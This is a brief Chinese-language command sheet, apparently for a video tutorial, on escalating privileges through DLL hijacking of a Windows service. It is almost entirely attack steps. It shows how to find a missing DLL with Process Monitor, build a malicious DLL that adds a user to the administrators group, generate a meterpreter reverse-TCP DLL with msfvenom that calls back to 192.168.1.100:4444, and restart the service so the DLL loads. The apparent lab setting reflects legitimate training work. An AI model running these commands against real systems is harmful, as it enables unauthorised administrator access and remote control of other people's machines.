windows服务提权&dll劫持

参考资料：

制作了一个youtube视频，下面是用到的一些命令。

sc是一个管理主机服务的工具

查看一个服务的运行状态，sc query 服务名

查看一个服务的配置信息，sc qc 服务名

【windows】

whoami

C:\Program Files\DLL Hijack Service\dllhijackservice.exe

进程监视器
dllhijackservice.exe
过滤
NAME NOT FOUND
---
sc qc dllsvc
sc start dllsvc

【kali】
修改windows_dll.c
cmd.exe /k net localgroup administrators user /add

编译
x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f dll -o hijackme.dll

handler -H 192.168.1.100 -P 4444 -p windows/x64/meterpreter/reverse_tcp

【windows】
将hijackme.dll复制到地址C:\Temp

运行命令sc stop dllsvc & sc start dllsvc

windows